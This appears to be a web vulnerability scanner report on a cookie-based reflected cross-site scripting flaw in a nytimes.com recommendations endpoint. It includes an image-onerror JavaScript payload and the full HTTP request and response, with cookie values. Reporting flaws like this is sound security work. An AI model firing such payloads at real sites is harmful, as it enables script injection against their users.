Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /recommendations/svc/personalized.json

Issue detail

The value of the RMID cookie is copied into the HTML document as plain text between tags. The payload 4ea42<img%20src%3da%20onerror%3dalert(1)>864a8deee8d was submitted in the RMID cookie. This input was echoed as 4ea42<img src=a onerror=alert(1)>864a8deee8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /recommendations/svc/personalized.json?hp=1 HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=0bd8082a282c4dd7b0f4b6204ea42<img%20src%3da%20onerror%3dalert(1)>864a8deee8d; adxcs=s*25381=0:1; nyt-m=648767966DF164CA18040FD9053D91B2&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305981179&vr=l.4.0.0.0.0&pr=l.4.1.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 21 May 2011 12:33:58 GMT
Content-Type: application/json
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 201

{"num_articles":null,"user_pic_url":null,"user_displayname":null,"using_rmid_suggestions":true,"suggestions":[],"uid":null,"rmid":"0bd8082a282c4dd7b0f4b6204ea42<img src=a onerror=alert(1)>864a8deee8d"}
